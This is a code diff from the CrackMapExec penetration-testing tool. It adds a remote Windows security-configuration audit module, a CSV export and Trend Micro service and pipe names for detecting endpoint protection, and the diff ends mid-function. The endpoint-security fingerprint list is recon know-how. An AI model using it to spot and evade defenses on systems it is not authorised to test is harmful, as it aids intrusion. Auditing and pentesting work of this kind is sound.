Merge branch 'master' into wmi
commit
f78b708564
68
cme/cmedb.py
68
cme/cmedb.py
|
@ -340,8 +340,74 @@ class DatabaseNavigator(cmd.Cmd):
|
||||||
writable_keys = [key[2] for key in keys]
|
writable_keys = [key[2] for key in keys]
|
||||||
filename = line[2]
|
filename = line[2]
|
||||||
write_list(filename, writable_keys)
|
write_list(filename, writable_keys)
|
||||||
|
elif command == "wcc":
|
||||||
|
if len(line) < 3:
|
||||||
|
print("[-] invalid arguments, export wcc <simple|detailed> <filename>")
|
||||||
|
return
|
||||||
|
|
||||||
|
csv_header_simple = (
|
||||||
|
"id",
|
||||||
|
"ip",
|
||||||
|
"hostname",
|
||||||
|
"check",
|
||||||
|
"status",
|
||||||
|
)
|
||||||
|
csv_header_detailed = (
|
||||||
|
"id",
|
||||||
|
"ip",
|
||||||
|
"hostname",
|
||||||
|
"check",
|
||||||
|
"description",
|
||||||
|
"status",
|
||||||
|
"reasons"
|
||||||
|
)
|
||||||
|
filename = line[2]
|
||||||
|
host_mapping = {}
|
||||||
|
check_mapping = {}
|
||||||
|
|
||||||
|
hosts = self.db.get_hosts()
|
||||||
|
checks = self.db.get_checks()
|
||||||
|
check_results = self.db.get_check_results()
|
||||||
|
rows = []
|
||||||
|
|
||||||
|
for result_id,hostid,checkid,secure,reasons in check_results:
|
||||||
|
row = [result_id]
|
||||||
|
if hostid in host_mapping:
|
||||||
|
row.extend(host_mapping[hostid])
|
||||||
else:
|
else:
|
||||||
print("[-] Invalid argument, specify creds, hosts, local_admins, shares or dpapi")
|
for host_id,ip,hostname,_,_,_,_,_,_,_,_ in hosts:
|
||||||
|
if host_id == hostid:
|
||||||
|
row.extend([ip, hostname])
|
||||||
|
host_mapping[hostid] = [ip, hostname]
|
||||||
|
break
|
||||||
|
if checkid in check_mapping:
|
||||||
|
row.extend(check_mapping[checkid])
|
||||||
|
else:
|
||||||
|
for check in checks:
|
||||||
|
check_id, name, description = check
|
||||||
|
if check_id == checkid:
|
||||||
|
row.extend([name, description])
|
||||||
|
check_mapping[checkid] = [name, description]
|
||||||
|
break
|
||||||
|
row.append('OK' if secure else 'KO')
|
||||||
|
row.append(reasons)
|
||||||
|
rows.append(row)
|
||||||
|
|
||||||
|
if line[1].lower() == "simple":
|
||||||
|
simple_rows = list((row[0], row[1], row[2], row[3], row[5]) for row in rows)
|
||||||
|
write_csv(filename, csv_header_simple, simple_rows)
|
||||||
|
elif line[1].lower() == "detailed":
|
||||||
|
write_csv(filename, csv_header_detailed, rows)
|
||||||
|
elif line[1].lower() == "signing":
|
||||||
|
hosts = self.db.get_hosts("signing")
|
||||||
|
signing_hosts = [host[1] for host in hosts]
|
||||||
|
write_list(filename, signing_hosts)
|
||||||
|
else:
|
||||||
|
print(f"[-] No such export option: {line[1]}")
|
||||||
|
return
|
||||||
|
print("[+] WCC exported")
|
||||||
|
else:
|
||||||
|
print("[-] Invalid argument, specify creds, hosts, local_admins, shares, wcc or dpapi")
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def help_export():
|
def help_export():
|
||||||
|
|
|
@ -1,12 +1,15 @@
|
||||||
#!/usr/bin/env python3
|
#!/usr/bin/env python3
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
import cme
|
||||||
import importlib
|
import importlib
|
||||||
|
import traceback
|
||||||
|
import sys
|
||||||
|
|
||||||
from os import listdir
|
from os import listdir
|
||||||
from os.path import dirname
|
from os.path import dirname
|
||||||
from os.path import join as path_join
|
from os.path import join as path_join
|
||||||
import sys
|
|
||||||
|
|
||||||
import cme
|
|
||||||
from cme.context import Context
|
from cme.context import Context
|
||||||
from cme.logger import CMEAdapter
|
from cme.logger import CMEAdapter
|
||||||
from cme.paths import CME_PATH
|
from cme.paths import CME_PATH
|
||||||
|
@ -64,6 +67,7 @@ class ModuleLoader:
|
||||||
return module
|
return module
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
||||||
|
self.logger.debug(traceback.format_exc())
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def init_module(self, module_path):
|
def init_module(self, module_path):
|
||||||
|
@ -116,6 +120,7 @@ class ModuleLoader:
|
||||||
return module
|
return module
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
||||||
|
self.logger.debug(traceback.format_exc())
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def list_modules(self):
|
def list_modules(self):
|
||||||
|
@ -131,7 +136,10 @@ class ModuleLoader:
|
||||||
for path in modules_paths:
|
for path in modules_paths:
|
||||||
for module in listdir(path):
|
for module in listdir(path):
|
||||||
if module[-3:] == ".py" and module != "example_module.py":
|
if module[-3:] == ".py" and module != "example_module.py":
|
||||||
|
try:
|
||||||
module_path = path_join(path, module)
|
module_path = path_join(path, module)
|
||||||
module_data = self.get_module_info(module_path)
|
module_data = self.get_module_info(module_path)
|
||||||
modules.update(module_data)
|
modules.update(module_data)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
return modules
|
return modules
|
||||||
|
|
|
@ -381,6 +381,61 @@ conf = {
|
||||||
|
|
||||||
],
|
],
|
||||||
},
|
},
|
||||||
|
{
|
||||||
|
"name": "Trend Micro Endpoint Security",
|
||||||
|
"services": [
|
||||||
|
{
|
||||||
|
"name": "Trend Micro Endpoint Basecamp",
|
||||||
|
"description": "Trend Micro Endpoint Basecamp",
|
||||||
|
},
|
||||||
|
|
||||||
|
{
|
||||||
|
"name": "TMBMServer",
|
||||||
|
"description": "Trend Micro Unauthorized Change Prevention Service",
|
||||||
|
},
|
||||||
|
|
||||||
|
{
|
||||||
|
"name": "Trend Micro Web Service Communicator",
|
||||||
|
"description": "Trend Micro Web Service Communicator",
|
||||||
|
},
|
||||||
|
|
||||||
|
{
|
||||||
|
"name": "TMiACAgentSvc",
|
||||||
|
"description": "Trend Micro Application Control Service (Agent)",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "CETASvc",
|
||||||
|
"description": "Trend Micro Cloud Endpoint Telemetry Service",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
|
||||||
|
"name": "iVPAgent",
|
||||||
|
"description": "Trend Micro Vulnerability Protection Service (Agent)",
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"pipes": [
|
||||||
|
{
|
||||||
|
"name": "IPC_XBC_XBC_AGENT_PIPE_*",
|
||||||
|
"processes": ["EndpointBasecamp.exe"],
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "iacagent_*",
|
||||||
|
"processes": ["TMiACAgentSvc.exe"],
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "OIPC_LWCS_PIPE_*",
|
||||||
|
"processes": ["TmListen.exe"],
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "Log_ServerNamePipe",
|
||||||
|
"processes": ["LogServer.exe"],
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "OIPC_NTRTSCAN_PIPE_*",
|
||||||
|
"processes": ["Ntrtscan.exe"],
|
||||||
|
},
|
||||||
|
],
|
||||||
|
},
|
||||||
{
|
{
|
||||||
"name": "Symantec Endpoint Protection",
|
"name": "Symantec Endpoint Protection",
|
||||||
"services": [
|
"services": [
|
||||||
|
|
|
@ -10,7 +10,7 @@ class CMEModule:
|
||||||
|
|
||||||
name = "example module"
|
name = "example module"
|
||||||
description = "I do something"
|
description = "I do something"
|
||||||
supported_protocols = []
|
supported_protocols = [] # Example: ['smb', 'mssql']
|
||||||
opsec_safe = True # Does the module touch disk?
|
opsec_safe = True # Does the module touch disk?
|
||||||
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
|
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
|
||||||
|
|
||||||
|
@ -28,7 +28,23 @@ class CMEModule:
|
||||||
"""Concurrent.
|
"""Concurrent.
|
||||||
Required if on_admin_login is not present. This gets called on each authenticated connection
|
Required if on_admin_login is not present. This gets called on each authenticated connection
|
||||||
"""
|
"""
|
||||||
pass
|
# Logging best practice
|
||||||
|
# Mostly you should use these functions to display information to the user
|
||||||
|
context.log.display("I'm doing something") # Use this for every normal message ([*] I'm doing something)
|
||||||
|
context.log.success("I'm doing something") # Use this for when something succeeds ([+] I'm doing something)
|
||||||
|
context.log.fail("I'm doing something") # Use this for when something fails ([-] I'm doing something), for example a remote registry entry is missing which is needed to proceed
|
||||||
|
context.log.highlight("I'm doing something") # Use this for when something is important and should be highlighted, printing credentials for example
|
||||||
|
|
||||||
|
# These are for debugging purposes
|
||||||
|
context.log.info("I'm doing something") # This will only be displayed if the user has specified the --verbose flag, so add additional info that might be useful
|
||||||
|
context.log.debug("I'm doing something") # This will only be displayed if the user has specified the --debug flag, so add info that you would might need for debugging errors
|
||||||
|
|
||||||
|
# These are for more critical error handling
|
||||||
|
context.log.error("I'm doing something") # This will not be printed in the module context and should only be used for critical errors (e.g. a required python file is missing)
|
||||||
|
try:
|
||||||
|
raise Exception("Exception that might occure")
|
||||||
|
except Exception as e:
|
||||||
|
context.log.exception(f"Exception occured: {e}") # This will display an exception traceback screen after an exception was raised and should only be used for critical errors
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
"""Concurrent.
|
"""Concurrent.
|
||||||
|
|
|
@ -0,0 +1,795 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import operator
|
||||||
|
import sys
|
||||||
|
import time
|
||||||
|
from termcolor import colored
|
||||||
|
|
||||||
|
from cme.logger import cme_logger
|
||||||
|
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||||
|
from impacket.dcerpc.v5 import rrp, samr, scmr
|
||||||
|
from impacket.dcerpc.v5.rrp import DCERPCSessionError
|
||||||
|
from impacket.smbconnection import SessionError as SMBSessionError
|
||||||
|
from impacket.examples.secretsdump import RemoteOperations
|
||||||
|
from impacket.system_errors import *
|
||||||
|
|
||||||
|
# Configuration variables
|
||||||
|
OUTDATED_THRESHOLD = 30
|
||||||
|
DEFAULT_OUTPUT_FILE = './wcc_results.json'
|
||||||
|
DEFAULT_OUTPUT_FORMAT = 'json'
|
||||||
|
VALID_OUTPUT_FORMATS = ['json', 'csv']
|
||||||
|
|
||||||
|
# Registry value types
|
||||||
|
REG_VALUE_TYPE_UNDEFINED = 0
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING = 1
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING_WITH_ENV = 2
|
||||||
|
REG_VALUE_TYPE_BINARY = 3
|
||||||
|
REG_VALUE_TYPE_32BIT_LE = 4
|
||||||
|
REG_VALUE_TYPE_32BIT_BE = 5
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING_SEQUENCE = 7
|
||||||
|
REG_VALUE_TYPE_64BIT_LE = 11
|
||||||
|
|
||||||
|
# Setup file logger
|
||||||
|
if 'wcc_logger' not in globals():
|
||||||
|
wcc_logger = logging.getLogger('WCC')
|
||||||
|
wcc_logger.propagate = False
|
||||||
|
log_filename = cme_logger.init_log_file()
|
||||||
|
log_filename = log_filename.replace('log_', 'wcc_')
|
||||||
|
wcc_logger.setLevel(logging.INFO)
|
||||||
|
wcc_file_handler = logging.FileHandler(log_filename)
|
||||||
|
wcc_file_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(message)s'))
|
||||||
|
wcc_logger.addHandler(wcc_file_handler)
|
||||||
|
|
||||||
|
class ConfigCheck:
|
||||||
|
"""
|
||||||
|
Class for performing the checks and holding the results
|
||||||
|
"""
|
||||||
|
|
||||||
|
module = None
|
||||||
|
|
||||||
|
def __init__(self, name, description="", checkers=[None], checker_args=[[]], checker_kwargs=[{}]):
|
||||||
|
self.check_id = None
|
||||||
|
self.name = name
|
||||||
|
self.description = description
|
||||||
|
assert len(checkers) == len(checker_args) and len(checkers) == len(checker_kwargs)
|
||||||
|
self.checkers = checkers
|
||||||
|
self.checker_args = checker_args
|
||||||
|
self.checker_kwargs = checker_kwargs
|
||||||
|
self.ok = True
|
||||||
|
self.reasons = []
|
||||||
|
|
||||||
|
def run(self):
|
||||||
|
for checker, args, kwargs in zip(self.checkers, self.checker_args, self.checker_kwargs):
|
||||||
|
if checker is None:
|
||||||
|
checker = HostChecker.check_registry
|
||||||
|
|
||||||
|
ok, reasons = checker(*args, **kwargs)
|
||||||
|
self.ok = self.ok and ok
|
||||||
|
self.reasons.extend(reasons)
|
||||||
|
|
||||||
|
def log(self, context):
|
||||||
|
result = 'passed' if self.ok else 'did not pass'
|
||||||
|
reasons = ', '.join(self.reasons)
|
||||||
|
wcc_logger.info(f'{self.connection.host}: Check "{self.name}" {result} because: {reasons}')
|
||||||
|
if self.module.quiet:
|
||||||
|
return
|
||||||
|
|
||||||
|
status = colored('OK', 'green', attrs=['bold']) if self.ok else colored('KO', 'red', attrs=['bold'])
|
||||||
|
reasons = ": " + ', '.join(self.reasons)
|
||||||
|
msg = f'{status} {self.name}'
|
||||||
|
info_msg = f'{status} {self.name}{reasons}'
|
||||||
|
context.log.highlight(msg)
|
||||||
|
context.log.info(info_msg)
|
||||||
|
|
||||||
|
class CMEModule:
|
||||||
|
'''
|
||||||
|
Windows Configuration Checker
|
||||||
|
|
||||||
|
Module author: @__fpr (Orange Cyberdefense)
|
||||||
|
'''
|
||||||
|
name = 'wcc'
|
||||||
|
description = 'Check various security configuration items on Windows machines'
|
||||||
|
supported_protocols = ['smb']
|
||||||
|
opsec_safe= True
|
||||||
|
multiple_hosts = True
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
'''
|
||||||
|
OUTPUT_FORMAT Format for report (Default: 'json')
|
||||||
|
OUTPUT Path for report
|
||||||
|
QUIET Do not print results to stdout (Default: False)
|
||||||
|
'''
|
||||||
|
self.output = module_options.get('OUTPUT')
|
||||||
|
self.output_format = module_options.get('OUTPUT_FORMAT', DEFAULT_OUTPUT_FORMAT)
|
||||||
|
if self.output_format not in VALID_OUTPUT_FORMATS:
|
||||||
|
self.output_format = DEFAULT_OUTPUT_FORMAT
|
||||||
|
self.quiet = module_options.get('QUIET', 'false').lower() in ('true', '1')
|
||||||
|
|
||||||
|
self.results = {}
|
||||||
|
ConfigCheck.module = self
|
||||||
|
HostChecker.module = self
|
||||||
|
|
||||||
|
def on_admin_login(self, context, connection):
|
||||||
|
self.results.setdefault(connection.host, {'checks':[]})
|
||||||
|
self.context = context
|
||||||
|
HostChecker(context, connection).run()
|
||||||
|
|
||||||
|
def on_shutdown(self, context, connection):
|
||||||
|
if self.output is not None:
|
||||||
|
self.export_results()
|
||||||
|
|
||||||
|
def add_result(self, host, result):
|
||||||
|
self.results[host]['checks'].append({
|
||||||
|
"Check":result.name,
|
||||||
|
"Description":result.description,
|
||||||
|
"Status":'OK' if result.ok else 'KO',
|
||||||
|
"Reasons":result.reasons
|
||||||
|
})
|
||||||
|
|
||||||
|
def export_results(self):
|
||||||
|
with open(self.output, 'w') as output:
|
||||||
|
if self.output_format == 'json':
|
||||||
|
json.dump(self.results, output)
|
||||||
|
elif self.output_format == 'csv':
|
||||||
|
output.write('Host,Check,Description,Status,Reasons')
|
||||||
|
for host in self.results:
|
||||||
|
for result in self.results[host]['checks']:
|
||||||
|
output.write(f'\n{host}')
|
||||||
|
for field in (result['Check'], result['Description'], result['Status'], ' ; '.join(result['Reasons']).replace('\x00','')):
|
||||||
|
if ',' in field:
|
||||||
|
field = field.replace('"', '""')
|
||||||
|
field = f'"{field}"'
|
||||||
|
output.write(f',{field}')
|
||||||
|
self.context.log.success(f'Results written to {self.output}')
|
||||||
|
|
||||||
|
class HostChecker:
|
||||||
|
module = None
|
||||||
|
|
||||||
|
def __init__(self, context, connection):
|
||||||
|
self.context = context
|
||||||
|
self.connection = connection
|
||||||
|
remoteOps = RemoteOperations(smbConnection=connection.conn, doKerberos=False)
|
||||||
|
remoteOps.enableRegistry()
|
||||||
|
self.dce = remoteOps._RemoteOperations__rrp
|
||||||
|
|
||||||
|
def run(self):
|
||||||
|
# Prepare checks
|
||||||
|
self.init_checks()
|
||||||
|
|
||||||
|
# Perform checks
|
||||||
|
self.check_config()
|
||||||
|
|
||||||
|
# Check methods #
|
||||||
|
#################
|
||||||
|
|
||||||
|
def init_checks(self):
|
||||||
|
# Declare the checks to do and how to do them
|
||||||
|
self.checks = [
|
||||||
|
ConfigCheck('Last successful update', 'Checks how old is the last successful update', checkers=[self.check_last_successful_update]),
|
||||||
|
ConfigCheck('LAPS', 'Checks if LAPS is installed', checkers=[self.check_laps]),
|
||||||
|
ConfigCheck("Administrator's name", 'Checks if Administror user name has been changed', checkers=[self.check_administrator_name]),
|
||||||
|
ConfigCheck('UAC configuration', 'Checks if UAC configuration is secure', checker_args=[[
|
||||||
|
self,
|
||||||
|
(
|
||||||
|
'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System',
|
||||||
|
'EnableLUA', 1
|
||||||
|
),(
|
||||||
|
'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System',
|
||||||
|
'LocalAccountTokenFilterPolicy', 0
|
||||||
|
)]]),
|
||||||
|
ConfigCheck('Hash storage format', 'Checks if storing hashes in LM format is disabled', checker_args=[[self, (
|
||||||
|
'HKLM\\System\\CurrentControlSet\\Control\\Lsa',
|
||||||
|
'NoLMHash', 1
|
||||||
|
)]]),
|
||||||
|
ConfigCheck('Always install elevated', 'Checks if AlwaysInstallElevated is disabled', checker_args=[[self, (
|
||||||
|
'HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer',
|
||||||
|
'AlwaysInstallElevated', 0
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('IPv6 preference', 'Checks if IPv6 is preferred over IPv4', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters',
|
||||||
|
'DisabledComponents', (32, 255), in_
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('Spooler service', 'Checks if the spooler service is disabled', checkers=[self.check_spooler_service]),
|
||||||
|
ConfigCheck('WDigest authentication', 'Checks if WDigest authentication is disabled', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest',
|
||||||
|
'UseLogonCredential', 0
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('WSUS configuration', 'Checks if WSUS configuration uses HTTPS', checkers=[self.check_wsus_running, None], checker_args=[[], [self, (
|
||||||
|
'HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate',
|
||||||
|
'WUServer', 'https://', startswith
|
||||||
|
),(
|
||||||
|
'HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate',
|
||||||
|
'UseWUServer', 0, operator.eq
|
||||||
|
)]], checker_kwargs=[{},{'options':{'lastWins':True}}]),
|
||||||
|
ConfigCheck('LSA cache', 'Checks how many logons are kept in the LSA cache', checker_args=[[self, (
|
||||||
|
'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon',
|
||||||
|
'CachedLogonsCount', 2, le
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('AppLocker', 'Checks if there are AppLocker rules defined', checkers=[self.check_applocker]),
|
||||||
|
ConfigCheck('RDP expiration time', 'Checks RDP session timeout', checker_args=[[self, (
|
||||||
|
'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services',
|
||||||
|
'MaxDisconnectionTime', 0, operator.gt
|
||||||
|
),(
|
||||||
|
'HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services',
|
||||||
|
'MaxDisconnectionTime', 0, operator.gt
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('CredentialGuard', 'Checks if CredentialGuard is enabled', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard',
|
||||||
|
'EnableVirtualizationBasedSecurity', 1
|
||||||
|
),(
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa',
|
||||||
|
'LsaCfgFlags', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('PPL', 'Checks if lsass runs as a protected process', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa',
|
||||||
|
'RunAsPPL', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('Powershell v2 availability', 'Checks if powershell v2 is available', checker_args=[[self, (
|
||||||
|
'HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine',
|
||||||
|
'PSCompatibleVersion', '2.0', not_(operator.contains)
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('LmCompatibilityLevel', 'Checks if LmCompatibilityLevel is set to 5', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa',
|
||||||
|
'LmCompatibilityLevel', 5, operator.ge
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('NBTNS', 'Checks if NBTNS is disabled on all interfaces', checkers=[self.check_nbtns]),
|
||||||
|
ConfigCheck('mDNS', 'Checks if mDNS is disabled', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNScache\\Parameters',
|
||||||
|
'EnableMDNS', 0
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('SMB signing', 'Checks if SMB signing is enabled', checker_args=[[self, (
|
||||||
|
'HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters',
|
||||||
|
'requiresecuritysignature', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('LDAP signing', 'Checks if LDAP signing is enabled', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters',
|
||||||
|
'LDAPServerIntegrity', 2
|
||||||
|
),(
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS',
|
||||||
|
'LdapEnforceChannelBinding', 2
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('SMB encryption', 'Checks if SMB encryption is enabled', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters',
|
||||||
|
'EncryptData', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('RDP authentication', 'Checks RDP authentication configuration (NLA auth and restricted admin mode)', checker_args=[[self, (
|
||||||
|
'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\',
|
||||||
|
'UserAuthentication', 1
|
||||||
|
),(
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA',
|
||||||
|
'RestrictedAdminMode', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('BitLocker configuration', 'Checks the BitLocker configuration (based on https://www.stigviewer.com/stig/windows_10/2020-06-15/finding/V-94859)', checker_args=[[self, (
|
||||||
|
'HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE',
|
||||||
|
'UseAdvancedStartup', 1
|
||||||
|
),(
|
||||||
|
'HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE',
|
||||||
|
'UseTPMPIN', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('Guest account disabled', 'Checks if the guest account is disabled', checkers=[self.check_guest_account_disabled]),
|
||||||
|
ConfigCheck('Automatic session lock', 'Checks if the session is automatically locked on after a period of inactivity', checker_args=[[self, (
|
||||||
|
'HKCU\\Control Panel\\Desktop',
|
||||||
|
'ScreenSaverIsSecure', 1
|
||||||
|
),(
|
||||||
|
'HKCU\\Control Panel\\Desktop',
|
||||||
|
'ScreenSaveTimeOut', 300, le
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('Powershell Execution Policy', 'Checks if the Powershell execution policy is set to "Restricted"', checker_args=[[self, (
|
||||||
|
'HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\ShellIds\Microsoft.Powershell',
|
||||||
|
'ExecutionPolicy', 'Restricted\x00'
|
||||||
|
),(
|
||||||
|
'HKCU\\SOFTWARE\\Microsoft\\PowerShell\\1\ShellIds\Microsoft.Powershell',
|
||||||
|
'ExecutionPolicy', 'Restricted\x00'
|
||||||
|
)
|
||||||
|
]], checker_kwargs=[{'options':{'KOIfMissing':False, 'lastWins':True}}])
|
||||||
|
]
|
||||||
|
|
||||||
|
# Add check to conf_checks table if missing
|
||||||
|
db_checks = self.connection.db.get_checks()
|
||||||
|
db_check_names = [ check._asdict()['name'].strip().lower() for check in db_checks ]
|
||||||
|
added = []
|
||||||
|
for i,check in enumerate(self.checks):
|
||||||
|
check.connection = self.connection
|
||||||
|
missing = True
|
||||||
|
for db_check in db_checks:
|
||||||
|
db_check = db_check._asdict()
|
||||||
|
if check.name.strip().lower() == db_check['name'].strip().lower():
|
||||||
|
missing = False
|
||||||
|
self.checks[i].check_id = db_check['id']
|
||||||
|
break
|
||||||
|
|
||||||
|
if missing:
|
||||||
|
self.connection.db.add_check(check.name, check.description)
|
||||||
|
added.append(check)
|
||||||
|
|
||||||
|
# Update check_id for checks added to the db
|
||||||
|
db_checks = self.connection.db.get_checks()
|
||||||
|
for i,check in enumerate(added):
|
||||||
|
check_id = None
|
||||||
|
for db_check in db_checks:
|
||||||
|
db_check = db_check._asdict()
|
||||||
|
if db_check['name'].strip().lower() == check.name.strip().lower():
|
||||||
|
check_id = db_check['id']
|
||||||
|
break
|
||||||
|
added[i].check_id = check_id
|
||||||
|
|
||||||
|
def check_config(self):
|
||||||
|
# Get host ID from db
|
||||||
|
host_id = None
|
||||||
|
hosts = self.connection.db.get_hosts(self.connection.host)
|
||||||
|
for host in hosts:
|
||||||
|
host = host._asdict()
|
||||||
|
if host['ip'] == self.connection.host and host['hostname'] == self.connection.hostname and host['domain'] == self.connection.domain:
|
||||||
|
host_id = host['id']
|
||||||
|
break
|
||||||
|
|
||||||
|
# Perform all the checks and store the results
|
||||||
|
for check in self.checks:
|
||||||
|
try:
|
||||||
|
check.run()
|
||||||
|
except Exception as e:
|
||||||
|
self.context.log.error(f'HostChecker.check_config(): Error while performing check {check.name}: {e}')
|
||||||
|
check.log(self.context)
|
||||||
|
self.module.add_result(self.connection.host, check)
|
||||||
|
if host_id is not None:
|
||||||
|
self.connection.db.add_check_result(host_id, check.check_id, check.ok, ', '.join(check.reasons).replace('\x00',''))
|
||||||
|
|
||||||
|
def check_registry(self, *specs, options={}):
|
||||||
|
"""
|
||||||
|
Perform checks that only require to compare values in the registry with expected values, according to the specs
|
||||||
|
a spec may be either a 3-tuple: (key name, value name, expected value), or a 4-tuple (key name, value name, expected value, operation), where operation is a function that implements a comparison operator
|
||||||
|
"""
|
||||||
|
default_options = {
|
||||||
|
'lastWins':False,
|
||||||
|
'stopOnOK':False,
|
||||||
|
'stopOnKO':False,
|
||||||
|
'KOIfMissing':True
|
||||||
|
}
|
||||||
|
default_options.update(options)
|
||||||
|
options = default_options
|
||||||
|
op = operator.eq
|
||||||
|
ok = True
|
||||||
|
reasons = []
|
||||||
|
|
||||||
|
for spec in specs:
|
||||||
|
try:
|
||||||
|
if len(spec) == 3:
|
||||||
|
(key, value_name, expected_value) = spec
|
||||||
|
elif len(spec) == 4:
|
||||||
|
(key, value_name, expected_value, op) = spec
|
||||||
|
else:
|
||||||
|
ok = False
|
||||||
|
reasons = ['Check could not be performed (invalid specification provided)']
|
||||||
|
return ok, reasons
|
||||||
|
except Exception as e:
|
||||||
|
self.module.log.error(f'Check could not be performed. Details: specs={specs}, dce={self.dce}, error: {e}')
|
||||||
|
return ok, reasons
|
||||||
|
|
||||||
|
if op == operator.eq:
|
||||||
|
opstring = '{left} == {right}'
|
||||||
|
nopstring = '{left} != {right}'
|
||||||
|
elif op == operator.contains:
|
||||||
|
opstring = '{left} in {right}'
|
||||||
|
nopstring = '{left} not in {right}'
|
||||||
|
elif op == operator.gt:
|
||||||
|
opstring = '{left} > {right}'
|
||||||
|
nopstring = '{left} <= {right}'
|
||||||
|
elif op == operator.ge:
|
||||||
|
opstring = '{left} >= {right}'
|
||||||
|
nopstring = '{left} < {right}'
|
||||||
|
elif op == operator.lt:
|
||||||
|
opstring = '{left} < {right}'
|
||||||
|
nopstring = '{left} >= {right}'
|
||||||
|
elif op == operator.le:
|
||||||
|
opstring = '{left} <= {right}'
|
||||||
|
nopstring = '{left} > {right}'
|
||||||
|
elif op == operator.ne:
|
||||||
|
opstring = '{left} != {right}'
|
||||||
|
nopstring = '{left} == {right}'
|
||||||
|
else:
|
||||||
|
opstring = f'{op.__name__}({{left}}, {{right}}) == True'
|
||||||
|
nopstring = f'{op.__name__}({{left}}, {{right}}) == True'
|
||||||
|
|
||||||
|
value = self.reg_query_value(self.dce, self.connection, key, value_name)
|
||||||
|
|
||||||
|
if type(value) == DCERPCSessionError:
|
||||||
|
if options['KOIfMissing']:
|
||||||
|
ok = False
|
||||||
|
if value.error_code in (ERROR_NO_MORE_ITEMS, ERROR_FILE_NOT_FOUND):
|
||||||
|
reasons.append(f'{key}: Key not found')
|
||||||
|
elif value.error_code == ERROR_OBJECT_NOT_FOUND:
|
||||||
|
